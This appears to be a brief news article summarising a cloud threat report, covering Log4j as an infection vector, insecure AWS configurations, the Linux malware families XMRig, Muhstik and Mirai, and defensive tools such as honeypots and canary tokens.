New data suggests that 31 percent of confirmed malware infections used Log4j as the initial infection vector (as revealed in the Cloud Threat Report). This third iteration of the report analyses four key areas of cloud security. Such is the concern over cybersecurity issues, the White House has recently issued a warning to the business community.
The report contains findings from a six-month review period. The core message is that t threat actors are broadening the scope of their efforts to gain illicit access to cloud data and resources
With the four main areas contained within the report, these relate to:
Cloud Security Posture
The report demonstrates that insecure configurations are on the rise, with 72 percent of environments in the last six months having insecure configurations. The most common risks were found in the AWS services IAM, S3 and EC2.
Small businesses in particular are at risk from cloud access brokers, who sell access to cloud accounts online.
Runtime threats & Linux Malware
Aside from the malware encountered within monitored environments, the report also presents some other newly discovered threats. These threats, in particular, provide an insight into the evolving landscape of Linux-based malware.
Vulnerabilities & Software Supply Chain
With over 30 percent of confirmed malware infections using Log4j as the initial infection vector, the Lacework Labs research observes a flood of requests. With these, the majority are benign. However, a minority are hostile especially as time went on. Here many of the requests from benign sources dropped off and the majority of requests came from malicious sources.
Muhstick, the malware family most commonly observed in the wild, can incorporate vulnerabilities like Log4j into their operations within 48 hours.
Too many organisations were found to have compliance violations within their cloud infrastructure, opening the door for attackers to gain initial access, escalate privileges, and impact protected data.
For example, over the past six months, XMRig, Muhstik, and Mirai dominated the environment, accounting for a combined 74 percent of the malicious installations Lacework observed.
Proactive Defence & Intelligence
Though attackers are rapidly becoming more sophisticated in their cloud operations, the report finds some positives. The better news is that defenders have plenty of tools with which to fight back; including Canary tokens, Honeypots and application sandboxing.
